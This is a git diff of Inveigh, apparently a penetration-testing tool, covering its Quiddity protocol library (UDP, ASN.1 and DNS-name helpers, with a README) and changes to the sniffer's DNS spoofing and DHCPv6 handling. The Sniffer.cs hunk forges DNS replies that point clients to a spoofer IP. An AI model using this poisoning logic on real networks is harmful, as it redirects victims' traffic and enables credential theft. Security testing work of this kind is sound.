OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.IO; +using System.Net; + +namespace Quiddity.UDP +{ + class UDPHeader + { + // https://tools.ietf.org/html/rfc768 + public ushort SourcePort { get; set; } + public ushort DestinationPort { get; set; } + public ushort Length { get; set; } + public ushort Checksum { get; set; } + + public UDPHeader() + { + this.SourcePort = 0; + this.DestinationPort = 0; + this.Length = 0; + this.Checksum = 0; + } + + public UDPHeader(byte[] data, int offset) + { + ReadBytes(data, offset); + } + + public UDPHeader ReadBytes(byte[] data, int offset) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + this.SourcePort = packetReader.BigEndianReadUInt16(); + this.DestinationPort = packetReader.BigEndianReadUInt16(); + this.Length = packetReader.BigEndianReadUInt16(); + this.Checksum = packetReader.ReadUInt16(); + return this; + } + + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.BigEndianWrite(this.SourcePort); + packetWriter.BigEndianWrite(this.DestinationPort); + packetWriter.BigEndianWrite(this.Length); + packetWriter.Write(this.Checksum); + return memoryStream.ToArray(); + } + + } + + public void IPv6Checksum(byte[] data, string clientIP, string sourceIP, int nextHeader) + { + byte[] pseudoHeader = IPv6PseudoHeader(clientIP, sourceIP, nextHeader, data.Length); + int e = 0; + + if ((pseudoHeader.Length + data.Length) % 2 != 0) + { + e = 1; + } + + byte[] packet = new byte[pseudoHeader.Length + data.Length + e]; + Buffer.BlockCopy(pseudoHeader, 0, packet, 0, pseudoHeader.Length); + Buffer.BlockCopy(data, 0, packet, pseudoHeader.Length, data.Length); + uint packetChecksum = 0; + int index = 0; + + while (index < packet.Length) + { + packetChecksum += Convert.ToUInt32(BitConverter.ToUInt16(packet, index)); + index += 2; + } + + packetChecksum = (packetChecksum >> 16) + (packetChecksum & 0xffff); + packetChecksum += (packetChecksum >> 16); + this.Checksum = (ushort)~packetChecksum; + } + + private byte[] IPv6PseudoHeader(string clientIP, string sourceIP, int nextHeader, int length) + { + byte[] lengthData = BitConverter.GetBytes(length); + Array.Reverse(lengthData); + byte[] pseudoHeader = new byte[40]; + Buffer.BlockCopy(IPAddress.Parse(sourceIP).GetAddressBytes(), 0, pseudoHeader, 0, 16); + Buffer.BlockCopy(IPAddress.Parse(clientIP).GetAddressBytes(), 0, pseudoHeader, 16, 16); + Buffer.BlockCopy(lengthData, 0, pseudoHeader, 32, 4); + pseudoHeader[39] = (byte)nextHeader; + return pseudoHeader; + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Quiddity.csproj b/Inveigh/Protocols/Quiddity/Quiddity/Quiddity.csproj new file mode 100644 index 0000000..4b462b6 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Quiddity.csproj @@ -0,0 +1,55 @@ + + + + net35;net45;net5.0 + + + + + $(MSBuildProgramFiles32)\Reference Assemblies\Microsoft\Framework\.NETFramework\v3.5\Profile\Client + false + 0.0.0-alpha + Kevin Robertson + + Quiddity is a protocol library designed for infosec testing and defense related tasks. Quiddity has partial implementation for many protocols including DNS, LLMNR, mDNS, SMB2, LDAP, and DHCPv6. + https://github.com/Kevin-Robertson/Quiddity + https://github.com/Kevin-Robertson/Quiddity.git + git + penetration testing, red team, blue team, purple team, packet, packets, LLMNR, NBNS, mDNS, DNS, SMB, LDAP, HTTP + initial alpha version + Copyright (c) 2021 Kevin Robertson + LICENSE + 0.0.0.0 + 0.0.0.0 + + + + + $(WINDIR)\Microsoft.NET\Framework64\v2.0.50727\System.DirectoryServices.Protocols.dll + False + + + + + + + 5.0 + + + + + + + 5.0 + + + + + + + True + + + + + diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Support/ASN1.cs b/Inveigh/Protocols/Quiddity/Quiddity/Support/ASN1.cs new file mode 100644 index 0000000..7c3e006 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Support/ASN1.cs @@ -0,0 +1,284 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.IO; +using System.Text; + +namespace Quiddity.Support +{ + // https://github.com/mono/mono/blob/main/mcs/class/Mono.Security/Mono.Security/ASN1.cs + + class ASN1 + { + public byte[] Tag { get; set; } + public byte[] Length { get; set; } + public byte[] Value { get; set; } + + public ASN1() + { + this.Tag = new byte[1]; + this.Length = new byte[1]; + this.Value = new byte[0]; + } + + public byte[] GetBytes(ASN1 packet) + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(packet.Tag); + packetWriter.Write(packet.Length); + packetWriter.Write(packet.Value); + return memoryStream.ToArray(); + } + + } + + public byte[] GetTagBytes(byte[] data, ref int index, int length, byte tag, out byte tagDecoded) + { + tagDecoded = 0x00; + byte[] value = new byte[0]; + int valueLength; + + while (index < length - 1 && tag != tagDecoded) + { + DecodeTag(data, ref index, out tagDecoded, out valueLength, out value); + + if (tagDecoded == 0 || tag == tagDecoded) + { + continue; + } + + if ((tagDecoded & 0x20) == 0x20) + { + int decodePosistion = index; + value = GetTagBytes(data, ref decodePosistion, (decodePosistion + valueLength), tag, out tagDecoded); + } + + index += valueLength; + } + + return value; + } + + public byte GetTag(byte[] data) + { + byte tagDecoded; + byte[] value; + int valueLength; + int index = 0; + + DecodeTag(data, ref index, out tagDecoded, out valueLength, out value); + return tagDecoded; + } + + public static byte[] GetTagBytes(int tag, byte[] data) + { + byte tagDecoded = 0x00; + int index = 0; + ASN1 asn1 = new ASN1(); + return asn1.GetTagBytes(data, ref index, data.Length, (byte)tag, out tagDecoded); + } + + public static byte[] GetTagBytes(int tag, byte[] data, int index) + { + byte tagDecoded = 0x00; + ASN1 asn1 = new ASN1(); + return asn1.GetTagBytes(data, ref index, data.Length, (byte)tag, out tagDecoded); + } + + public byte[] Decode(byte[] data, ref int index, int length) + { + byte tag; + byte[] value = new byte[0]; + int valueLength; + int i = 0; + + while (index < length - 1) + { + DecodeTag(data, ref index, out tag, out valueLength, out value); + + if (tag == 0) + { + continue; + } + + if((tag & 0x20) == 0x20) + { + int decodePosistion = index; + value = Decode(data, ref decodePosistion, (decodePosistion + valueLength)); + } + + index += valueLength; + i++; + + } + + return value; + } + + public void DecodeTag(byte[] data, ref int index, out byte tag, out int length, out byte[] value) + { + tag = data[index++]; + length = data[index++]; + + if ((length & 0x80) == 0x80) + { + int lengthCount = length & 0x7f; + length = 0; + + for (int i = 0; i < lengthCount; i++) + { + length = length * 256 + data[index++]; + } + + } + + value = new byte[length]; + Buffer.BlockCopy(data, index, value, 0, length); + } + + public byte[] Encode(byte tag, byte[] data) + { + int dataLength = data.Length; + this.Tag[0] = tag; + + if (dataLength <= 127) + { + this.Length[0] = (byte)dataLength; + } + else if (dataLength <= 255) + { + this.Length = new byte[2]; + this.Length[0] = 0x81; + this.Length[1] = (byte)dataLength; + } + else if (dataLength > 255) + { + this.Length = new byte[3]; + this.Length[0] = 0x82; + this.Length[1] = (byte)(dataLength >> 8); + this.Length[2] = (byte)(dataLength); + } + + return Utilities.BlockCopy(this.Tag, this.Length, data); + } + + public static byte[] Encode(int tag, byte[] data) + { + ASN1 asn1 = new ASN1(); + return asn1.Encode((byte)tag, data); + } + + public static string[] DecodeOctetStringArray (byte[] data) + { + int index = Array.IndexOf(data, 0x04, 0); + List list = new List(); + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + + while (index > -1) + { + memoryStream.Position += 2; + list.Add(Encoding.UTF8.GetString(packetReader.ReadBytes(data[index + 1]))); + index = Array.IndexOf(data, 0x04, (int)memoryStream.Position); + } + + } + + return list.ToArray(); + } + + public static int GetLength(int index, byte[] data) + { + int length = 0; + + switch (data[index]) + { + + case 0x84: + { + index++; + byte[] lengthData = new byte[4]; + Buffer.BlockCopy(data, index, lengthData, 0, 4); + Array.Reverse(lengthData); + length = BitConverter.ToInt32(lengthData, 0); + length += 4; + } + break; + + case 0x83: + { + index++; + byte[] lengthData = new byte[3]; + Buffer.BlockCopy(data, index, lengthData, 0, 4); + Array.Reverse(lengthData); + length = BitConverter.ToInt32(lengthData, 0); + length += 3; + } + break; + + case 0x82: + { + index++; + byte[] lengthData = new byte[2]; + Buffer.BlockCopy(data, index, lengthData, 0, 2); + Array.Reverse(lengthData); + length = BitConverter.ToInt16(lengthData, 0); + length += 2; + } + break; + + case 0x81: + { + length = data[index++]; + length += 3; + } + break; + + default: + length = data[index]; + length += 2; + break; + + } + + return length; + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Support/Utilities.cs b/Inveigh/Protocols/Quiddity/Quiddity/Support/Utilities.cs new file mode 100644 index 0000000..272e502 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Support/Utilities.cs @@ -0,0 +1,126 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.Support +{ + class Utilities + { + + public static byte[] BlockCopy(byte[] Data1, byte[] Data2) + { + byte[] data = new byte[Data1.Length + Data2.Length]; + Buffer.BlockCopy(Data1, 0, data, 0, Data1.Length); + Buffer.BlockCopy(Data2, 0, data, Data1.Length, Data2.Length); + return data; + } + + public static byte[] BlockCopy(byte[] Data1, byte[] Data2, byte[] Data3) + { + byte[] data = new byte[Data1.Length + Data2.Length + Data3.Length]; + Buffer.BlockCopy(Data1, 0, data, 0, Data1.Length); + Buffer.BlockCopy(Data2, 0, data, Data1.Length, Data2.Length); + Buffer.BlockCopy(Data3, 0, data, (Data1.Length + Data2.Length), Data3.Length); + return data; + } + + public static byte[] BlockCopy(byte[] Data1, byte[] Data2, byte[] Data3, byte[] Data4) + { + byte[] data = new byte[Data1.Length + Data2.Length + Data3.Length + Data4.Length]; + Buffer.BlockCopy(Data1, 0, data, 0, Data1.Length); + Buffer.BlockCopy(Data2, 0, data, Data1.Length, Data2.Length); + Buffer.BlockCopy(Data3, 0, data, (Data1.Length + Data2.Length), Data3.Length); + Buffer.BlockCopy(Data4, 0, data, (Data1.Length + Data2.Length + Data3.Length), Data4.Length); + return data; + } + + public static bool ArrayIsNullOrEmpty(Array array) + { + return (array == null || array.Length == 0); + } + + public static ushort DataToUInt16(byte[] data) + { + return BitConverter.ToUInt16(data, 0); + } + + public static byte[] GetDNSNameBytes(string name, bool addByte) + { + var indexList = new List(); + + for (int i = name.IndexOf('.'); i > -1; i = name.IndexOf('.', i + 1)) + { + indexList.Add(i); + } + + using (MemoryStream nameMemoryStream = new MemoryStream()) + { + string nameSection = ""; + int nameStart = 0; + + if (indexList.Count > 0) + { + int nameEnd = 0; + + foreach (int index in indexList) + { + nameEnd = index - nameStart; + nameMemoryStream.Write(BitConverter.GetBytes(nameEnd), 0, 1); + nameSection = name.Substring(nameStart, nameEnd); + nameMemoryStream.Write(Encoding.UTF8.GetBytes(nameSection), 0, nameSection.Length); + nameStart = index + 1; + } + + } + + nameSection = name.Substring(nameStart); + nameMemoryStream.Write(BitConverter.GetBytes(nameSection.Length), 0, 1); + nameMemoryStream.Write(Encoding.UTF8.GetBytes(nameSection), 0, nameSection.Length); + + if (addByte) + { + nameMemoryStream.Write((new byte[1] { 0x00 }), 0, 1); + } + + return nameMemoryStream.ToArray(); + } + + } + + + } + +} diff --git a/Inveigh/Protocols/Quiddity/README.md b/Inveigh/Protocols/Quiddity/README.md new file mode 100644 index 0000000..13f604f --- /dev/null +++ b/Inveigh/Protocols/Quiddity/README.md @@ -0,0 +1,17 @@ +# Quiddity# Quiddity + +Quiddity is a work in progress C# miscellaneous protocol library meant for infosec testing/defense. The library contains classes for packet segment structures, protocol functions, and listeners. This library is currently being developed as part of Inveigh and other, unreleased projects. It's likely to go through major changes. + +## Example Usage + +### LLMNR Listener + +``` +LLMNRListener llmnrListener = new LLMNRListener(); +llmnrListener.Start(listenerIP, replyIPv4, replyIPv6); +``` +### Parse SMB2 Header +``` +SMB2Header smb2Header = new SMB2Header(byteArray); +Console.WriteLine(smb2Header.Command); // output SMB2 command type of parsed header +``` \ No newline at end of file diff --git a/Inveigh/Protocols/Quiddity/Support/ASN1.cs b/Inveigh/Protocols/Quiddity/Support/ASN1.cs deleted file mode 100644 index b1862c7..0000000 --- a/Inveigh/Protocols/Quiddity/Support/ASN1.cs +++ /dev/null @@ -1,284 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.IO; -using System.Text; - -namespace Quiddity.Support -{ - // https://github.com/mono/mono/blob/main/mcs/class/Mono.Security/Mono.Security/ASN1.cs - - class ASN1 - { - public byte[] Tag { get; set; } - public byte[] Length { get; set; } - public byte[] Value { get; set; } - - public ASN1() - { - this.Tag = new byte[1]; - this.Length = new byte[1]; - this.Value = new byte[0]; - } - - public byte[] GetBytes(ASN1 packet) - { - - using (MemoryStream memoryStream = new MemoryStream()) - { - PacketWriter packetWriter = new PacketWriter(memoryStream); - packetWriter.Write(packet.Tag); - packetWriter.Write(packet.Length); - packetWriter.Write(packet.Value); - return memoryStream.ToArray(); - } - - } - - public byte[] GetTagBytes(byte[] data, ref int index, int length, byte tag, out byte tagDecoded) - { - tagDecoded = 0x00; - byte[] value = new byte[0]; - int valueLength; - - while (index < length - 1 && tag != tagDecoded) - { - DecodeTag(data, ref index, out tagDecoded, out valueLength, out value); - - if (tagDecoded == 0 || tag == tagDecoded) - { - continue; - } - - if ((tagDecoded & 0x20) == 0x20) - { - int decodePosistion = index; - value = GetTagBytes(data, ref decodePosistion, (decodePosistion + valueLength), tag, out tagDecoded); - } - - index += valueLength; - } - - return value; - } - - public byte GetTag(byte[] data) - { - byte tagDecoded; - byte[] value; - int valueLength; - int index = 0; - - DecodeTag(data, ref index, out tagDecoded, out valueLength, out value); - return tagDecoded; - } - - public static byte[] GetTagBytes(int tag, byte[] data) - { - byte tagDecoded = 0x00; - int index = 0; - ASN1 asn1 = new ASN1(); - return asn1.GetTagBytes(data, ref index, data.Length, (byte)tag, out tagDecoded); - } - - public static byte[] GetTagBytes(int tag, byte[] data, int index) - { - byte tagDecoded = 0x00; - ASN1 asn1 = new ASN1(); - return asn1.GetTagBytes(data, ref index, data.Length, (byte)tag, out tagDecoded); - } - - public byte[] Decode(byte[] data, ref int index, int length) - { - byte tag; - byte[] value = new byte[0]; - int valueLength; - int i = 0; - - while (index < length - 1) - { - DecodeTag(data, ref index, out tag, out valueLength, out value); - - if (tag == 0) - { - continue; - } - - if((tag & 0x20) == 0x20) - { - int decodePosistion = index; - value = Decode(data, ref decodePosistion, (decodePosistion + valueLength)); - } - - index += valueLength; - i++; - - } - - return value; - } - - public void DecodeTag(byte[] data, ref int index, out byte tag, out int length, out byte[] value) - { - tag = data[index++]; - length = data[index++]; - - if ((length & 0x80) == 0x80) - { - int lengthCount = length & 0x7f; - length = 0; - - for (int i = 0; i < lengthCount; i++) - { - length = length * 256 + data[index++]; - } - - } - - value = new byte[length]; - Buffer.BlockCopy(data, index, value, 0, length); - } - - public byte[] Encode(byte tag, byte[] data) - { - int dataLength = data.Length; - this.Tag[0] = tag; - - if (dataLength <= 127) - { - this.Length[0] = (byte)dataLength; - } - else if (dataLength <= 255) - { - this.Length = new byte[2]; - this.Length[0] = 0x81; - this.Length[1] = (byte)dataLength; - } - else if (dataLength > 255) - { - this.Length = new byte[3]; - this.Length[0] = 0x82; - this.Length[1] = (byte)(dataLength >> 8); - this.Length[2] = (byte)(dataLength); - } - - return Utilities.BlockCopy(this.Tag, this.Length, data); - } - - public static byte[] Encode(int tag, byte[] data) - { - ASN1 asn1 = new ASN1(); - return asn1.Encode((byte)tag, data); - } - - public static string[] DecodeOctetStringArray (byte[] data) - { - int index = Array.IndexOf(data, 0x04, 0); - List list = new List(); - - using (MemoryStream memoryStream = new MemoryStream(data)) - { - PacketReader packetReader = new PacketReader(memoryStream); - - while (index > -1) - { - memoryStream.Position += 2; - list.Add(Encoding.UTF8.GetString(packetReader.ReadBytes(data[index + 1]))); - index = Array.IndexOf(data, 0x04, (int)memoryStream.Position); - } - - } - - return list.ToArray(); - } - - public static int GetLength(int index, byte[] data) - { - int length = 0; - - switch (data[index]) - { - - case 0x84: - { - index++; - byte[] lengthData = new byte[4]; - Buffer.BlockCopy(data, index, lengthData, 0, 4); - Array.Reverse(lengthData); - length = BitConverter.ToInt32(lengthData, 0); - length += 4; - } - break; - - case 0x83: - { - index++; - byte[] lengthData = new byte[3]; - Buffer.BlockCopy(data, index, lengthData, 0, 4); - Array.Reverse(lengthData); - length = BitConverter.ToInt32(lengthData, 0); - length += 3; - } - break; - - case 0x82: - { - index++; - byte[] lengthData = new byte[2]; - Buffer.BlockCopy(data, index, lengthData, 0, 2); - Array.Reverse(lengthData); - length = BitConverter.ToInt16(lengthData, 0); - length += 2; - } - break; - - case 0x81: - { - length = data[index++]; - length += 3; - } - break; - - default: - length = data[index]; - length += 2; - break; - - } - - return length; - } - - } - -} diff --git a/Inveigh/Protocols/Quiddity/Support/Utilities.cs b/Inveigh/Protocols/Quiddity/Support/Utilities.cs deleted file mode 100644 index 51c994a..0000000 --- a/Inveigh/Protocols/Quiddity/Support/Utilities.cs +++ /dev/null @@ -1,126 +0,0 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must retain the above copyright notice, this - * list of conditions and the following disclaimer. - * - * 2. Redistributions in binary form must reproduce the above copyright notice, - * this list of conditions and the following disclaimer in the documentation - * and/or other materials provided with the distribution. - * - * 3. Neither the name of the copyright holder nor the names of its - * contributors may be used to endorse or promote products derived from - * this software without specific prior written permission. - * - * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" - * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE - * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR - * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER - * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, - * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE - * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - */ -using System; -using System.Collections.Generic; -using System.IO; -using System.Linq; -using System.Text; - -namespace Quiddity.Support -{ - class Utilities - { - - public static byte[] BlockCopy(byte[] Data1, byte[] Data2) - { - byte[] data = new byte[Data1.Length + Data2.Length]; - Buffer.BlockCopy(Data1, 0, data, 0, Data1.Length); - Buffer.BlockCopy(Data2, 0, data, Data1.Length, Data2.Length); - return data; - } - - public static byte[] BlockCopy(byte[] Data1, byte[] Data2, byte[] Data3) - { - byte[] data = new byte[Data1.Length + Data2.Length + Data3.Length]; - Buffer.BlockCopy(Data1, 0, data, 0, Data1.Length); - Buffer.BlockCopy(Data2, 0, data, Data1.Length, Data2.Length); - Buffer.BlockCopy(Data3, 0, data, (Data1.Length + Data2.Length), Data3.Length); - return data; - } - - public static byte[] BlockCopy(byte[] Data1, byte[] Data2, byte[] Data3, byte[] Data4) - { - byte[] data = new byte[Data1.Length + Data2.Length + Data3.Length + Data4.Length]; - Buffer.BlockCopy(Data1, 0, data, 0, Data1.Length); - Buffer.BlockCopy(Data2, 0, data, Data1.Length, Data2.Length); - Buffer.BlockCopy(Data3, 0, data, (Data1.Length + Data2.Length), Data3.Length); - Buffer.BlockCopy(Data4, 0, data, (Data1.Length + Data2.Length + Data3.Length), Data4.Length); - return data; - } - - public static bool ArrayIsNullOrEmpty(Array array) - { - return (array == null || array.Length == 0); - } - - public static ushort DataToUInt16(byte[] data) - { - return BitConverter.ToUInt16(data, 0); - } - - public static byte[] GetDNSNameBytes(string name, bool addByte) - { - var indexList = new List(); - - for (int i = name.IndexOf('.'); i > -1; i = name.IndexOf('.', i + 1)) - { - indexList.Add(i); - } - - using (MemoryStream nameMemoryStream = new MemoryStream()) - { - string nameSection = ""; - int nameStart = 0; - - if (indexList.Count > 0) - { - int nameEnd = 0; - - foreach (int index in indexList) - { - nameEnd = index - nameStart; - nameMemoryStream.Write(BitConverter.GetBytes(nameEnd), 0, 1); - nameSection = name.Substring(nameStart, nameEnd); - nameMemoryStream.Write(Encoding.UTF8.GetBytes(nameSection), 0, nameSection.Length); - nameStart = index + 1; - } - - } - - nameSection = name.Substring(nameStart); - nameMemoryStream.Write(BitConverter.GetBytes(nameSection.Length), 0, 1); - nameMemoryStream.Write(Encoding.UTF8.GetBytes(nameSection), 0, nameSection.Length); - - if (addByte) - { - nameMemoryStream.Write((new byte[1] { 0x00 }), 0, 1); - } - - return nameMemoryStream.ToArray(); - } - - } - - - } - -} diff --git a/Inveigh/Protocols/README.md b/Inveigh/Protocols/README.md deleted file mode 100644 index 13f604f..0000000 --- a/Inveigh/Protocols/README.md +++ /dev/null @@ -1,17 +0,0 @@ -# Quiddity# Quiddity - -Quiddity is a work in progress C# miscellaneous protocol library meant for infosec testing/defense. The library contains classes for packet segment structures, protocol functions, and listeners. This library is currently being developed as part of Inveigh and other, unreleased projects. It's likely to go through major changes. - -## Example Usage - -### LLMNR Listener - -``` -LLMNRListener llmnrListener = new LLMNRListener(); -llmnrListener.Start(listenerIP, replyIPv4, replyIPv6); -``` -### Parse SMB2 Header -``` -SMB2Header smb2Header = new SMB2Header(byteArray); -Console.WriteLine(smb2Header.Command); // output SMB2 command type of parsed header -``` \ No newline at end of file diff --git a/Inveigh/Sniffer/Sniffer.cs b/Inveigh/Sniffer/Sniffer.cs index 4aed22e..36106cf 100644 --- a/Inveigh/Sniffer/Sniffer.cs +++ b/Inveigh/Sniffer/Sniffer.cs @@ -294,22 +294,39 @@ namespace Inveigh DNSListener listener = new DNSListener(UInt32.Parse(Program.argDNSTTL)); - if (packet.Header.IsQuery()) + if(!packet.Header.IsDynamicUpdateRequest()) { - - if (listener.Check(packet.Question.Name, packet.Question.Type, clientIP, out string message)) + if (packet.Header.IsQuery()) { - byte[] buffer = packet.GetBytes(UInt32.Parse(Program.argDNSTTL), Program.dnsSerial, Program.argSpooferIP, Program.argSpooferIPv6); - if (!Utilities.ArrayIsNullOrEmpty(buffer)) + if (listener.Check(packet.Question.Name, packet.Question.Type, clientIP, out string message)) { - UDPSocket.SendTo(clientIP, clientPort, sourceIP, sourcePort, buffer, false); + byte[] buffer = packet.GetBytes(UInt32.Parse(Program.argDNSTTL), Program.dnsSerial, Program.argSpooferIP, Program.argSpooferIPv6); + + if (!Utilities.ArrayIsNullOrEmpty(buffer)) + { + UDPSocket.SendTo(clientIP, clientPort, sourceIP, sourcePort, buffer, false); + } + } + Output.SpooferOutput("DNS", packet.Question.Type, packet.Question.Name, clientIP, message); } - Output.SpooferOutput("DNS", packet.Question.Type, packet.Question.Name, clientIP, message); } + else + { + byte[] flags = new byte[2] { 0xa8, 0x05 }; + byte[] dnsPayload = new byte[data.Length - 2]; + System.Buffer.BlockCopy(data, 2, dnsPayload, 0, dnsPayload.Length); + MemoryStream dnsMemoryStream = new MemoryStream(); + dnsMemoryStream.Write(data, 0, data.Length); + dnsMemoryStream.Position = 2; + dnsMemoryStream.Write(flags, 0, 2); + UDPSocket.SendTo(clientIP, clientPort, sourceIP, sourcePort, dnsMemoryStream.ToArray(), false); + + } + } @@ -438,7 +455,14 @@ namespace Inveigh break; } - byte[] clientMACData = new DHCPv6DUIDLLT(packet.Option1.DUID).LinkLayerAddress; + DHCPv6DUIDLL duid = new DHCPv6DUIDLL(packet.Option1.DUID); + byte[] clientMACData = new DHCPv6DUIDLL(packet.Option1.DUID).LinkLayerAddress; + + if (duid.DUIDType == 1) + { + clientMACData = new DHCPv6DUIDLLT(packet.Option1.DUID).LinkLayerAddress; + } + string clientMAC = BitConverter.ToString(clientMACData).Replace("-", ":"); string clientHostName = ""; diff --git a/Inveigh/Sockets/ICMPv6Socket.cs b/Inveigh/Sockets/ICMPv6Socket.cs index 3f7c4a5..d4f7461 100644 --- a/Inveigh/Sockets/ICMPv6Socket.cs +++ b/Inveigh/Sockets/ICMPv6Socket.cs @@ -1,35 +1,4 @@ -/* - * BSD 3-Clause License - * - * Copyright (c) 2021, Kevin Robertson - * All rights reserved. - * - * Redistribution and use in source and binary forms, with or without - * modification, are permitted provided that the following conditions are met: - * - * 1. Redistributions of source code must 